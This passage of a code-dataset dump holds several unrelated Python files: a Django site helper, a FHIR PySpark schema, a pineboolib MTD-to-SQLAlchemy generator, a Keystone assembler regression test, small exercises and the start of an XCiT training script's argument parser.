u_list[1]))\n for u_list in list(zip(i.numpy(), v.numpy()))]\n predictions_top_k.update(dict(zip(map(self._data.private_users.get,\n range(offset, 
offset_stop)), items_ratings_pair)))\n return predictions_top_k\n"} {"ext": "py", "sha": "1a2ee5c384e1bc675aca57bff1eb30291c6e2ad1", "content": "from django.apps import apps\n\n\ndef get_current_site(request):\n \"\"\"\n Check if contrib.sites is installed and return either the current\n ``Site`` object or a ``RequestSite`` object based on the request.\n \"\"\"\n # Imports are inside the function because its point is to avoid importing\n # the Site models when django.contrib.sites isn't installed.\n if apps.is_installed('django.contrib.sites'):\n from .models import Site\n return Site.objects.get_current(request)\n else:\n from .requests import RequestSite\n return RequestSite(request)\n"} {"ext": "py", "sha": "1a2ee8806c7295fe5ca0987773269b476e6ccb94", "content": "class BuySellStock:\n # @param prices, a list of stock prices\n # @return index of buy and sell price\n def choiceStocks(self, prices):\n n = len(prices)\n if n == 0:\n return None, None\n if n == 1:\n return 0, 0\n maxPrice = prices[n - 1]\n mpIndex = n - 1\n maxProfit = 0\n for price in range(n):\n currPrice = prices[n - price - 1]\n if currPrice > maxPrice:\n maxPrice = currPrice\n mpIndex = n - price - 1\n currProfit = maxPrice - currPrice\n if currProfit > maxProfit:\n maxProfit = currProfit\n bpIndex = n - price - 1\n return bpIndex, mpIndex\n\n# Driver code to test the program\nrun = BuySellStock()\nprint(run.choiceStocks([5,6,7,8,10,3,8,7,11,1,2,11]))\n"} {"ext": "py", "sha": "1a2ee9b36c7eaf80f22187398afb4ca70cdb3239", "content": "from typing import Union, List, Optional\n\nfrom pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType\n\n\n# This file is auto-generated by generate_schema so do not edit it manually\n# noinspection PyPep8Naming\nclass SubstanceNucleicAcid_SugarSchema:\n \"\"\"\n Nucleic acids are defined by three distinct elements: the base, sugar and\n linkage. Individual substance/moiety IDs will be created for each of these\n elements. The nucleotide sequence will be always entered in the 5’-3’\n direction.\n \"\"\"\n\n # noinspection PyDefaultArgument\n @staticmethod\n def get_schema(\n max_nesting_depth: Optional[int] = 6,\n nesting_depth: int = 0,\n nesting_list: List[str] = [],\n max_recursion_limit: Optional[int] = 2,\n include_extension: Optional[bool] = False,\n extension_fields: Optional[List[str]] = None,\n extension_depth: int = 0,\n max_extension_depth: Optional[int] = 2,\n include_modifierExtension: Optional[bool] = False,\n use_date_for: Optional[List[str]] = None,\n parent_path: Optional[str] = \"\",\n ) -> Union[StructType, DataType]:\n \"\"\"\n Nucleic acids are defined by three distinct elements: the base, sugar and\n linkage. Individual substance/moiety IDs will be created for each of these\n elements. The nucleotide sequence will be always entered in the 5’-3’\n direction.\n\n\n id: Unique id for the element within a resource (for internal references). This\n may be any string value that does not contain spaces.\n\n extension: May be used to represent additional information that is not part of the basic\n definition of the element. To make the use of extensions safe and manageable,\n there is a strict set of governance applied to the definition and use of\n extensions. 
Though any implementer can define an extension, there is a set of\n requirements that SHALL be met as part of the definition of the extension.\n\n modifierExtension: May be used to represent additional information that is not part of the basic\n definition of the element and that modifies the understanding of the element\n in which it is contained and/or the understanding of the containing element's\n descendants. Usually modifier elements provide negation or qualification. To\n make the use of extensions safe and manageable, there is a strict set of\n governance applied to the definition and use of extensions. Though any\n implementer can define an extension, there is a set of requirements that SHALL\n be met as part of the definition of the extension. Applications processing a\n resource are required to check for modifier extensions.\n\n Modifier extensions SHALL NOT change the meaning of any elements on Resource\n or DomainResource (including cannot change the meaning of modifierExtension\n itself).\n\n identifier: The Substance ID of the sugar or sugar-like component that make up the\n nucleotide.\n\n name: The name of the sugar or sugar-like component that make up the nucleotide.\n\n residueSite: The residues that contain a given sugar will be captured. The order of given\n residues will be captured in the 5‘-3‘direction consistent with the base\n sequences listed above.\n\n \"\"\"\n if extension_fields is None:\n extension_fields = [\n \"valueBoolean\",\n \"valueCode\",\n \"valueDate\",\n \"valueDateTime\",\n \"valueDecimal\",\n \"valueId\",\n \"valueInteger\",\n \"valuePositiveInt\",\n \"valueString\",\n \"valueTime\",\n \"valueUnsignedInt\",\n \"valueUri\",\n \"valueUrl\",\n \"valueReference\",\n \"valueCodeableConcept\",\n \"valueAddress\",\n ]\n from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema\n from spark_fhir_schemas.r4.complex_types.identifier import IdentifierSchema\n\n if (\n max_recursion_limit\n and nesting_list.count(\"SubstanceNucleicAcid_Sugar\") >= max_recursion_limit\n ) or (max_nesting_depth and nesting_depth >= max_nesting_depth):\n return StructType([StructField(\"id\", StringType(), True)])\n # add my name to recursion list for later\n my_nesting_list: List[str] = nesting_list + [\"SubstanceNucleicAcid_Sugar\"]\n my_parent_path = (\n parent_path + \".substancenucleicacid_sugar\"\n if parent_path\n else \"substancenucleicacid_sugar\"\n )\n schema = StructType(\n [\n # Unique id for the element within a resource (for internal references). This\n # may be any string value that does not contain spaces.\n StructField(\"id\", StringType(), True),\n # May be used to represent additional information that is not part of the basic\n # definition of the element. To make the use of extensions safe and manageable,\n # there is a strict set of governance applied to the definition and use of\n # extensions. 
Though any implementer can define an extension, there is a set of\n # requirements that SHALL be met as part of the definition of the extension.\n StructField(\n \"extension\",\n ArrayType(\n ExtensionSchema.get_schema(\n max_nesting_depth=max_nesting_depth,\n nesting_depth=nesting_depth + 1,\n nesting_list=my_nesting_list,\n max_recursion_limit=max_recursion_limit,\n include_extension=include_extension,\n extension_fields=extension_fields,\n extension_depth=extension_depth,\n max_extension_depth=max_extension_depth,\n include_modifierExtension=include_modifierExtension,\n use_date_for=use_date_for,\n parent_path=my_parent_path,\n )\n ),\n True,\n ),\n # May be used to represent additional information that is not part of the basic\n # definition of the element and that modifies the understanding of the element\n # in which it is contained and/or the understanding of the containing element's\n # descendants. Usually modifier elements provide negation or qualification. To\n # make the use of extensions safe and manageable, there is a strict set of\n # governance applied to the definition and use of extensions. Though any\n # implementer can define an extension, there is a set of requirements that SHALL\n # be met as part of the definition of the extension. Applications processing a\n # resource are required to check for modifier extensions.\n #\n # Modifier extensions SHALL NOT change the meaning of any elements on Resource\n # or DomainResource (including cannot change the meaning of modifierExtension\n # itself).\n StructField(\n \"modifierExtension\",\n ArrayType(\n ExtensionSchema.get_schema(\n max_nesting_depth=max_nesting_depth,\n nesting_depth=nesting_depth + 1,\n nesting_list=my_nesting_list,\n max_recursion_limit=max_recursion_limit,\n include_extension=include_extension,\n extension_fields=extension_fields,\n extension_depth=extension_depth,\n max_extension_depth=max_extension_depth,\n include_modifierExtension=include_modifierExtension,\n use_date_for=use_date_for,\n parent_path=my_parent_path,\n )\n ),\n True,\n ),\n # The Substance ID of the sugar or sugar-like component that make up the\n # nucleotide.\n StructField(\n \"identifier\",\n IdentifierSchema.get_schema(\n max_nesting_depth=max_nesting_depth,\n nesting_depth=nesting_depth + 1,\n nesting_list=my_nesting_list,\n max_recursion_limit=max_recursion_limit,\n include_extension=include_extension,\n extension_fields=extension_fields,\n extension_depth=extension_depth + 1,\n max_extension_depth=max_extension_depth,\n include_modifierExtension=include_modifierExtension,\n use_date_for=use_date_for,\n parent_path=my_parent_path,\n ),\n True,\n ),\n # The name of the sugar or sugar-like component that make up the nucleotide.\n StructField(\"name\", StringType(), True),\n # The residues that contain a given sugar will be captured. 
The order of given\n # residues will be captured in the 5‘-3‘direction consistent with the base\n # sequences listed above.\n StructField(\"residueSite\", StringType(), True),\n ]\n )\n if not include_extension:\n schema.fields = [\n c\n if c.name != \"extension\"\n else StructField(\"extension\", StringType(), True)\n for c in schema.fields\n ]\n\n if not include_modifierExtension:\n schema.fields = [\n c\n if c.name != \"modifierExtension\"\n else StructField(\"modifierExtension\", StringType(), True)\n for c in schema.fields\n ]\n\n return schema\n"} {"ext": "py", "sha": "1a2eea72af7ac86b9529a084586cc260eef68da8", "content": "m = h = mu = 0\nwhile True:\n print(25*'-')\n print(' CADASTRE UMA PESSOA')\n print(25*'-')\n i = int(input('Idade: '))\n if i > 17:\n m+=1\n while True:\n s = input('Sexo: [M/F] ').strip().upper()[0]\n if s in 'MF':\n break\n print(25*'-')\n if s == 'M':\n h+=1\n if s == 'F' and i < 21:\n mu+=1\n while True:\n q = input('Quer continuar? [S/N] ').strip().upper()[0]\n if q in 'SN':\n break\n if q == 'N':\n break\nprint(f'====== FIM DO PROGRAMA ======\\nTotal de pessoas com mais de 18 anos: {m}\\nAo todo temos {h} homens cadastrados.\\nE temos {mu} mulheres com menos de 20 anos.')"} {"ext": "py", "sha": "1a2eeb918f387d630e9884de81cfb4ee96e47303", "content": "# -*- coding: utf-8 -*-\n\"\"\"\nMTD Parser to sqlAlchemy model.\n\nCreates a Python file side by side with the original MTD file.\nCan be overloaded with a custom class to enhance/change available\nfunctions. See pineboolib/pnobjectsfactory.py\n\"\"\"\n\nfrom pineboolib import application, logging\nfrom pineboolib.application import file\nimport os\n\nfrom typing import List, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from pineboolib.application.metadata import pnfieldmetadata, pntablemetadata # pragma: no cover\n\n\nLOGGER = logging.get_logger(__name__)\n\nRESERVER_WORDS = [\"pass\"]\n\n\ndef mtd_parse(\n meta_or_name: Union[str, \"pntablemetadata.PNTableMetaData\"], path_mtd: str = \"\"\n) -> str:\n \"\"\"\n Parse MTD into SqlAlchemy model.\n \"\"\"\n\n if application.PROJECT.conn_manager is None:\n raise Exception(\"Project is not connected yet\")\n\n dest_file = \"%s_model.py\" % (\n path_mtd\n if isinstance(meta_or_name, str)\n else \"%s/cache/%s\" % (application.PROJECT.tmpdir, meta_or_name.name())\n )\n\n if os.path.exists(dest_file):\n return dest_file\n\n if isinstance(meta_or_name, str):\n metadata = application.PROJECT.conn_manager.manager().metadata(meta_or_name, True)\n else:\n metadata = meta_or_name\n\n if metadata is None:\n return \"\"\n\n lines = _generate_model(metadata)\n if not lines:\n dest_file = \"\"\n else:\n _write_file(dest_file, lines)\n\n return dest_file\n\n\ndef _write_file(file_name: str, lines: List[str]) -> None:\n \"\"\"Write lines to a file.\"\"\"\n\n file_ = open(file_name, \"w\", encoding=\"UTF-8\")\n file_.writelines([line if line.endswith(\"\\n\") else \"%s\\n\" % line for line in lines])\n file_.close()\n\n\ndef _get_meta(file_mtd: \"file.File\") -> List[str]:\n \"\"\"Return list with meta.\"\"\"\n\n mtd_data_list: List[str] = []\n if os.path.exists(file_mtd.path()):\n mtd_data = application.PROJECT.conn_manager.manager().metadata(file_mtd.filename, True)\n if mtd_data is not None:\n mtd_data_list = _generate_model(mtd_data, False)\n\n return mtd_data_list\n\n\ndef _generate_model(mtd_table: \"pntablemetadata.PNTableMetaData\", header: bool = True) -> List[str]:\n \"\"\"\n Create a list of lines from a mtd_table (pntablemetadata.PNTableMetaData).\n \"\"\"\n\n return 
_create_declaration(mtd_table, header)\n\n\ndef generate_field(field: \"pnfieldmetadata.PNFieldMetaData\") -> str:\n \"\"\"\n Get text representation for sqlAlchemy of a field type given its pnfieldmetadata.PNFieldMetaData.\n \"\"\"\n data: List[str] = []\n # TYPE\n\n # = \"String\"\n ret = \"\"\n type_ = field.type()\n if type_ in (\"int, serial\"):\n ret = \"sqlalchemy.Integer\"\n elif type_ in (\"uint\"):\n ret = \"sqlalchemy.BigInteger\"\n elif type_ in (\"calculated\"):\n ret = \"sqlalchemy.String\"\n # elif field.type() in (\"double\"):\n # ret = \"sqlalchemy.Numeric\"\n # ret += \"(%s , %s)\" % (field.partInteger(), field.partDecimal())\n elif type_ == \"double\":\n ret = \"sqlalchemy.Float\"\n\n elif type_ in (\"string\", \"stringlist\", \"pixmap\"):\n ret = \"sqlalchemy.String\"\n if field.length():\n ret += \"(%s)\" % field.length()\n\n elif type_ in (\"bool\", \"unlock\"):\n ret = \"sqlalchemy.Boolean\"\n\n elif type_ == \"timestamp\":\n ret = \"sqlalchemy.DateTime\"\n\n elif type_ == \"json\":\n ret = \"sqlalchemy.types.JSON\"\n\n elif type_ == \"time\":\n ret = \"sqlalchemy.Time\"\n\n elif type_ == \"date\":\n ret = \"sqlalchemy.Date\"\n\n elif type_ in (\"bytearray\"):\n ret = \"sqlalchemy.LargeBinary\"\n\n else:\n ret = \"Desconocido %s\" % type_\n\n data.append(ret)\n\n if field.isPrimaryKey():\n data.append(\"primary_key = True\")\n\n return \", \".join(data)\n\n\ndef generate_field_metadata(field: \"pnfieldmetadata.PNFieldMetaData\") -> List[str]:\n \"\"\"Generate field data from a PNFieldMetaData.\"\"\"\n\n field_data: List = []\n\n # NAME\n field_data.append(\"'name' : '%s'\" % field.name())\n\n # ALIAS\n if field.alias():\n field_data.append(\"'alias' : '%s'\" % field.alias().replace(\"'\", '\"'))\n\n # PK\n if field.isPrimaryKey():\n field_data.append(\"'pk' : True\")\n # CK\n if field.isCompoundKey():\n field_data.append(\"'ck' : True\")\n\n # TYPE\n field_relation: List[str] = []\n field_data.append(\"'type' : '%s'\" % field.type())\n\n # LENGTH\n if field.length():\n field_data.append(\"'length' : %s\" % field.length())\n\n # REGEXP\n if field.regExpValidator():\n field_data.append(\"'regexp' : '%s'\" % field.regExpValidator())\n\n rel_list: List[str]\n # RELATIONS 1M\n for rel in field.relationList():\n rel_list = []\n rel_list.append(\"'card' : '%s'\" % rel.cardinality())\n rel_list.append(\"'table' : '%s'\" % rel.foreignTable())\n rel_list.append(\"'field' : '%s'\" % rel.foreignField())\n if rel.deleteCascade():\n rel_list.append(\"'delc' : True\")\n if rel.updateCascade():\n rel_list.append(\"'updc' : True\")\n if not rel.checkIn():\n rel_list.append(\"'checkin' : False\")\n\n field_relation.append(\"{%s}\" % \", \".join(rel_list))\n\n # if field_relation:\n # field_data.append(\"'relations' : [%s]\" % \", \".join(field_relation))\n\n # RELATIONS M1\n if field.private._relation_m1:\n rel = field.private._relation_m1\n rel_list = []\n rel_list.append(\"'card' : '%s'\" % rel.cardinality())\n rel_list.append(\"'table' : '%s'\" % rel.foreignTable())\n rel_list.append(\"'field' : '%s'\" % rel.foreignField())\n if rel.deleteCascade():\n rel_list.append(\"'delC' : True\")\n if rel.updateCascade():\n rel_list.append(\"'updC' : True\")\n if not rel.checkIn():\n rel_list.append(\"'checkIn' : False\")\n\n field_relation.append(\"{%s}\" % \", \".join(rel_list))\n\n if field_relation:\n field_data.append(\"'relations' : [%s]\" % \", \".join(field_relation))\n\n # ASSOCIATED\n if field.private.associated_field_name:\n\n field_data.append(\n \"'associated':{'with' : '%s', 
'by' : '%s' }\"\n % (field.private.associated_field_filter_to, field.private.associated_field_name)\n )\n\n # UNIQUE\n if field.isUnique():\n field_data.append(\"'isunique' : True\")\n\n # ALLOW_NULL\n if not field.allowNull():\n field_data.append(\"'null' : False\")\n\n # DEFAULT_VALUE\n if field.defaultValue() is not None:\n value = (\n field.defaultValue()\n if field.type() in [\"bool\", \"unlock\", \"int\", \"uint\", \"double\", \"serial\", \"json\"]\n else \"'%s'\" % field.defaultValue()\n )\n field_data.append(\"'default' : %s\" % value)\n\n # OUT_TRANSACTION\n if field.outTransaction():\n field_data.append(\"'outtransaction' : True\")\n\n # COUNTER\n if field.isCounter():\n field_data.append(\"'counter' : True\")\n\n # CALCULATED\n if field.calculated():\n field_data.append(\"'calculated' : True\")\n\n # FULLY_CALCULATED\n if field.fullyCalculated():\n field_data.append(\"'fullycalculated' : True\")\n\n # TRIMMED\n if field.trimmed():\n field_data.append(\"'trimmed' : True\")\n\n # VISIBLE\n if not field.visible():\n field_data.append(\"'visible' : False\")\n\n # VISIBLE_GRID\n if not field.visibleGrid():\n field_data.append(\"'visiblegrid' : False\")\n\n # EDITABLE\n if not field.editable():\n field_data.append(\"'editable' : False\")\n\n if field.type() == \"double\":\n # PARTI\n if field.partInteger():\n field_data.append(\"'partI' : %s\" % field.partInteger())\n\n # PARTD\n if field.partDecimal():\n field_data.append(\"'partD' : %s\" % field.partDecimal())\n\n # INDEX\n if field.isIndex():\n field_data.append(\"'index' : True\")\n\n # OPTIONS_LIST\n if field.optionsList():\n texto = \"\"\n for item in field.optionsList():\n texto += \"'%s', \" % item\n\n field_data.append(\"'optionslist' : [%s]\" % texto)\n # SEARCH_OPTIONS\n if field.searchOptions():\n texto = \"\"\n for item in field.searchOptions():\n texto += \"'%s', \" % item\n\n field_data.append(\"'searchoptions' : [%s]\" % texto)\n\n return field_data\n\n\ndef use_mtd_fields(path_model: str) -> bool:\n \"\"\"Return if models use mtd fields.\"\"\"\n\n file_ = open(path_model, \"r\", encoding=\"UTF-8\")\n lines = file_.readlines()\n file_.close()\n for line in lines:\n if line.find(\"legacy_metadata\") > -1:\n return False\n\n return True\n\n\ndef populate_fields(dest_file_name: str, mtd_name: str) -> str:\n \"\"\"Populate models fields with mtd field.\"\"\"\n\n new_file_path: str = \"\"\n if mtd_name in application.PROJECT.files.keys():\n file_mtd = application.PROJECT.files[mtd_name]\n\n file_ = open(dest_file_name, \"r\")\n lines = file_.readlines()\n file_.close()\n new_lines: List[str] = []\n for number, line in enumerate(list(lines)):\n if line.find(\"__tablename__\") > -1:\n new_lines = lines[0 : number + 1] + _get_meta(file_mtd) + lines[number + 1 :]\n break\n\n if new_lines:\n new_key = \"%s_model.py\" % file_mtd.filename[:-4]\n conn = application.PROJECT.conn_manager.mainConn()\n db_name = conn.DBName()\n application.PROJECT.files[new_key] = file.File(\n file_mtd.module,\n \"%s_model.py\" % file_mtd.path(),\n basedir=file_mtd.basedir,\n sha=file_mtd.sha,\n db_name=db_name,\n )\n application.PROJECT.files[new_key].filekey = \"%s_model.py\" % file_mtd.filekey\n new_file_path = application.PROJECT.files[new_key].path()\n if os.path.exists(new_file_path):\n os.remove(new_file_path)\n\n _write_file(new_file_path, new_lines)\n\n return new_file_path\n\n\ndef _create_declaration(\n mtd_table: \"pntablemetadata.PNTableMetaData\", header: bool = True\n) -> List[str]:\n \"\"\"Create metadata section.\"\"\"\n\n data: 
List[str] = []\n list_data_field: List[str] = []\n validator_list: List[str] = []\n metadata_table: List = []\n metadata_table.append(\"'name' : '%s'\" % mtd_table.name())\n metadata_table.append(\"'alias' : '%s'\" % mtd_table.alias())\n if mtd_table.isQuery():\n metadata_table.append(\"'query':'%s'\" % mtd_table.query())\n if mtd_table.concurWarn():\n metadata_table.append(\"'concurwarn': True\")\n if mtd_table.detectLocks():\n metadata_table.append(\"'detectlocks':True\")\n if mtd_table.FTSFunction():\n metadata_table.append(\"'ftsfunction' :'%s'\" % mtd_table.FTSFunction())\n\n try:\n mtd_table.primaryKey()\n except Exception as error: # noqa: F841\n pass\n\n field_list: List[List[str]] = []\n pk_found = False\n\n for field in mtd_table.fieldList(): # Crea los campos\n\n if field.isPrimaryKey():\n pk_found = True\n\n if field.name() in validator_list:\n LOGGER.warning(\n \"Hay un campo %s duplicado en %s.mtd. Omitido\", field.name(), mtd_table.name()\n )\n else:\n\n field_data = []\n field_data.append(\" \")\n if field.name() in RESERVER_WORDS:\n field_data.append(\"%s_\" % field.name())\n else:\n field_data.append(field.name())\n\n field_data.append(\" = sqlalchemy.Column('%s', \" % field.name())\n field_list.append(generate_field_metadata(field))\n field_data.append(generate_field(field))\n field_data.append(\")\")\n validator_list.append(field.name())\n if field.isPrimaryKey():\n pk_found = True\n\n list_data_field.append(\"\".join(field_data))\n\n meta_fields: List = []\n for meta_field in field_list:\n meta_fields.append(\"{%s}\" % \", \".join(meta_field))\n\n metadata_table.append(\n \"\\n 'fields' : [\\n %s\\n ]\" % \",\\n \".join(meta_fields)\n )\n\n class_name = \"%s%s\" % (mtd_table.name()[0].upper(), mtd_table.name()[1:])\n\n if header:\n data.append(\"# -*- coding: utf-8 -*-\")\n data.append(\"# Translated with pineboolib %s\" % application.PINEBOO_VER)\n data.append(\n '\"\"\"%s%s_model module.\"\"\"' % (mtd_table.name()[0].upper(), mtd_table.name()[1:])\n )\n data.append(\"\")\n\n data.append(\"from pineboolib.application.database.orm import basemodel\")\n data.append(\"from pineboolib.qsa import qsa\")\n data.append(\"\")\n data.append(\"import sqlalchemy\")\n data.append(\"\")\n data.append(\"\")\n\n data.append(\"# @class_declaration Oficial\")\n data.append(\"class Oficial(basemodel.BaseModel): # type: ignore [misc] # noqa: F821\")\n data.append(' \"\"\"Oficial class.\"\"\"')\n data.append(\" __tablename__ = '%s'\" % mtd_table.name()) # si query nombre query\n data.append(\"\")\n else:\n data.append(\"\")\n data.append(\"\")\n data.append(\" # --- POPULATED WITH METADATA FIELDS ---\")\n data.append(\"\")\n data.append(\"\")\n data.append(\" # --- Metadata --->\")\n data.append(\" legacy_metadata = {%s}\" % \", \".join(metadata_table))\n data.append(\"\\n\")\n data.append(\" # <--- Metadata ---\")\n\n data.append(\"\")\n\n data.append(\"\")\n data.append(\" # --- Fields --->\")\n data.append(\"\")\n\n for data_field in list_data_field:\n data.append(data_field)\n\n data.append(\"\")\n data.append(\" # <--- Fields ---\")\n\n data.append(\"\")\n if header:\n data.append(\"# @class_declaration %s\" % class_name)\n data.append(\n \"class %s(Oficial): # type: ignore [misc] # noqa: F821\" % class_name\n ) # si query nombre query\n data.append(' \"\"\"%s class.\"\"\"' % class_name)\n data.append(\" pass\")\n\n if not pk_found and not mtd_table.isQuery():\n LOGGER.warning(\n \"La tabla %s no tiene definida una clave primaria. 
No se generará el model.\"\n % (mtd_table.name())\n )\n data = []\n\n return data\n"} {"ext": "py", "sha": "1a2eebb7c19bacf5dae0ea0950d2f17e0427094b", "content": "#!/usr/bin/python\n\n# Tests if the SS segment override prefix is not explicitly produced when unnecessary\n\n# Github issue: #9\n# Author: Duncan (mrexodia)\n\nfrom keystone import *\n\nimport regress\n\nclass TestX86(regress.RegressTest):\n def runTest(self):\n # Initialize Keystone engine\n ks = Ks(KS_ARCH_X86, KS_MODE_32)\n # Assemble to get back insn encoding & statement count\n encoding1, _ = ks.asm(b\"MOV EAX,DWORD PTR SS:[ESP+8]\")\n encoding2, _ = ks.asm(b\"MOV EAX,DWORD PTR SS:[EBP+8]\")\n # Assert the result\n self.assertEqual(encoding1, [ 0x8B, 0x44, 0x24, 0x08 ])\n self.assertEqual(encoding2, [ 0x8B, 0x45, 0x08 ])\n\n encoding, _ = ks.asm(b\"MOV DWORD PTR SS:[EBP-0xC],0x1994000\")\n self.assertEqual(encoding, [ 0xC7, 0x45, 0xF4, 0x00, 0x40, 0x99, 0x01 ])\nif __name__ == '__main__':\n regress.main()\n"} {"ext": "py", "sha": "1a2eebea61469c862ce664d315bdd9275bcab6f5", "content": "# Copyright (c) 2015-present, Facebook, Inc.\n# All rights reserved.\n\"\"\"\nThe main training/evaluation loop\nModified from: https://github.com/facebookresearch/deit\n\"\"\"\nimport argparse\nimport datetime\nimport numpy as np\nimport time\nimport torch\nimport torch.backends.cudnn as cudnn\nimport json\nimport os\n\nfrom pathlib import Path\n\nfrom timm.data import Mixup\nfrom timm.models import create_model\nfrom timm.loss import LabelSmoothingCrossEntropy, SoftTargetCrossEntropy\nfrom timm.scheduler import create_scheduler\nfrom timm.optim import create_optimizer\nfrom timm.utils import NativeScaler, get_state_dict, ModelEma\n\nfrom datasets import build_dataset\nfrom engine import train_one_epoch, evaluate\nfrom losses import DistillationLoss\nfrom samplers import RASampler\nimport utils\n\nimport xcit\n\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('XCiT training and evaluation script', add_help=False)\n parser.add_argument('--batch-size', default=64, type=int)\n parser.add_argument('--epochs', default=400, type=int)\n\n # Model parameters\n parser.add_argument('--model', default='xcit_s_12', type=str, metavar='MODEL',\n help='Name of model to train')\n parser.add_argument('--input-size', default=224, type=int, help='images input size')\n\n parser.add_argument('--drop', type=float, default=0.0, metavar='PCT',\n help='Dropout rate (default: 0.)')\n parser.add_argument('--drop-path', type=float, default=0.1, metavar='PCT',\n help='Drop path rate (default: 0.1)')\n\n parser.add_argument('--model-ema', action='store_true')\n parser.add_argument('--no-model-ema', action='store_false', dest='model_ema')\n parser.set_defaults(model_ema=True)\n parser.add_argument('--model-ema-decay', type=float, default=0.99996, help='')\n parser.add_argument('--model-ema-force-cpu', action='store_true', default=False, help='')\n\n # Optimizer parameters\n parser.add_argument('--opt', default='adamw', type=str, metavar='OPTIMIZER',\n help='Optimizer (default: \"adamw\"')\n parser.add_argument('--opt-eps', default=1e-8, type=float, metavar='EPSILON',\n help='Optimizer Epsilon (default: 1e-8)')\n parser.add_argument('--opt-betas', default=None, type=float, nargs='+', metavar='BETA',\n help='Optimizer Betas (default: None, use opt default)')\n parser.add_argument('--clip-grad', type=float, default=None, metavar='NORM',\n help='Clip gradient norm (default: None, no clipping)')\n parser.add_argument('--momentum', type=float, default=0.9, 
metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--weight-decay', type=float, default=0.05,\n help='weight decay (default: 0.05)')\n\n # Learning rate schedule parameters\n parser.add_argument('--sched', default='cosine', type=str, metavar='SCHEDULER',\n help='LR scheduler (default: \"cosine\"')\n parser.add_argument('--lr', type=float, default=5e-4, metavar='LR',\n help='learning rate (default: 5e-4)')\n parser.add_argument('--lr-noise', type=float, nargs='+', default=None, metavar='pct, pct',\n help='learning rate noise on/off epoch percentages')\n parser.add_argument('--lr-noise-pct', type=float, default=0.67, metavar='PERCENT',\n help='learning rate noise limit percent (default: 0.67)')\n parser.add_argument('--lr-noise-std', type=float, default=1.0, metavar='STDDEV',\n help='learning rate noise std-dev (default: 1.0)')\n parser.add_argument('--warmup-lr', type=float, default=1e-6, metavar='LR',\n help='warmup learning rate (default: 1e-6)')\n parser.add_argument('--min-lr', type=float, default=1e-5, metavar='LR',\n help='lower lr bound for cyclic schedulers that hit 0 (1e-5)')\n\n parser.add_argument('--decay-epochs', type=float, default=30, metavar='N',\n help='epoch interval to decay LR')\n parser.add_argument('--warmup-epochs', type=int, default=5, metavar='N',\n help='epochs to warmup LR, if scheduler supports')\n parser.add_argument('--cooldown-epochs', type=int, default=10, metavar='N',\n help='epochs to cooldown LR at min_lr, after cyclic schedule ends')\n parser.add_argument('--patience-epochs', type=int, default=10, metavar='N',\n help='patience epochs for Plateau LR scheduler (default: 10')\n parser.add_argument('--decay-rate', '--dr', type=float, default=0.1, metavar='RATE',\n help='LR decay rate (default: 0.1)')\n\n # Augmentation parameters\n parser.add_argument('--color-jitter', type=float, default=0.4, metavar='PCT',\n help='Color jitter factor (default: 0.4)')\n parser.add_argument('--aa', type=str, default='rand-m9-mstd0.5-inc1', metavar='NAME',\n help='Use AutoAugment policy. \"v0\" or \"original\". \" + \\\n \"(default: rand-m9-mstd0.5-inc1)'),\n parser.add_argument('--smoothing', type=float, default=0.1, help='Label smoothing (default: 0.1)')\n parser.add_argument('--train-interpolation', type=str, default='bicubic',\n help='Training interpolation (random, bilinear, bicubic default: \"bicubic\")')\n\n parser.add_argument('--repeated-aug', action='store_true')\n parser.add_argument('--no-repeated-aug', action='store_false', dest='repeated_aug')\n parser.set_defaults(repeated_aug=True)\n\n # * Random Erase params\n parser.add_argument('--reprob', type=float, default=0.25, metavar='PCT',\n help='Random erase prob (default: 0.25)')\n parser.add_argument('--remode', type=str, default='pixel',\n help='Random erase mode (default: \"pixel\")')\n parser.add_argument('--recount', type=int, default=1,\n help='Random erase count (default: 1)')\n parser.add_argument('--resplit', action='store_true', default=False,\n help='Do not random erase first (clean) augmentation split')\n\n # * Mixup params\n parser.add_argument('--mixup', type=float, default=0.8,\n help='mixup alpha, mixup enabled if > 0. (default: 0.8)')\n parser.add_argument('--cutmix', type=float, default=1.0,\n help='cutmix alpha, cutmix enabled if > 0. 
(default: 1.0)')\n parser.add_argument('--cutmix-minmax', type=float, nargs='+', default=None,\n help='cutmix min/max ratio, overrides alpha and enables cutmix if set (default: None)')\n parser.add_argument('--mixup-prob', type=float, default=1.0,\n help='Probability of performing mixup or cutmix when either/both is enabled')\n parser.add_argument('--mixup-switch-prob', type=float, default=0.5,\n help='Probability of switching to cutmix when both mixup and cutmix enabled')\n parser.add_argument('--mixup-mode', type=str, default='batch',\n help='How to apply mixup/cutmix params. Per \"batch\", \"pair\", or \"elem\"')\n\n # Distillation parameters\n parser.add_argument('--teacher-model', default='regnety_160', type=str, metavar='MODEL',\n help='Name of teacher model to train (default: \"regnety_160\"')\n parser.add_argument('--teacher-path', type=str, default='')\n parser.add_argument('--distillation-type', default='none', choices=['none', 'soft', 'hard'], type=str, help=\"\")\n parser.add_argument('--distillation-alpha', default=0.5, type=float, help=\"\")\n parser.add_argument('--distillation-tau', default=1.0, type=float, help=\"\")\n\n\n # Dataset parameters\n parser.add_argument('--data-path', default='/datasets01/imagenet_full_size/061417/', type=str,\n help='dataset path')\n parser.add_argument('--data-set', default='IMNET', choices=['CIFAR10', 'CIFAR100', 'IMNET',\n 'INAT', 'INAT19', 'CARS', 'FLOWERS',\n 'IMNET22k'],\n type=str, help='Image Net dataset path')\n parser.add_argument('--inat-category', default='name',\n choices=['kingdom', 'phylum', 'class', 'order', 'supercategory', 'family', 'genus', 'name'],\n type=str, help='semantic granularity')\n\n parser.add_argument('--output_dir', default='',\n help='path where to save, empty for no saving')\n parser.add_argument('--device', default='cuda',\n help='device to use for training / testing')\n parser.add_argument('--seed', default=0, type=int)\n parser.add_argument('--resume', default='', help='resume from checkpoint')\n parser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='start epoch')\n parser.add_argument('--eval', action='store_true', help='Perform evaluation only')\n parser.add_argument('--dist-eval', action='store_true', default=False, help='Enabling distributed evaluation')\n parser.add_argument('--num_workers', default=10, type=int)\n parser.add_argument('--pin-mem', action='store_true',\n help='Pin CPU memory in DataLoader for more efficient (sometimes) transfer to GPU.')\n parser.add_argument('--no-pin-mem', action='store_false', dest='pin_mem',\n help='')\n parser.set_defaults(pin_mem=True)\n\n # distributed training parameters\n parser.add_argument('--world_size', default=1, type=int,\n help='number of distributed processes')\n parser.add_argument('--dist_url', default='env://', help='url used to set up distributed 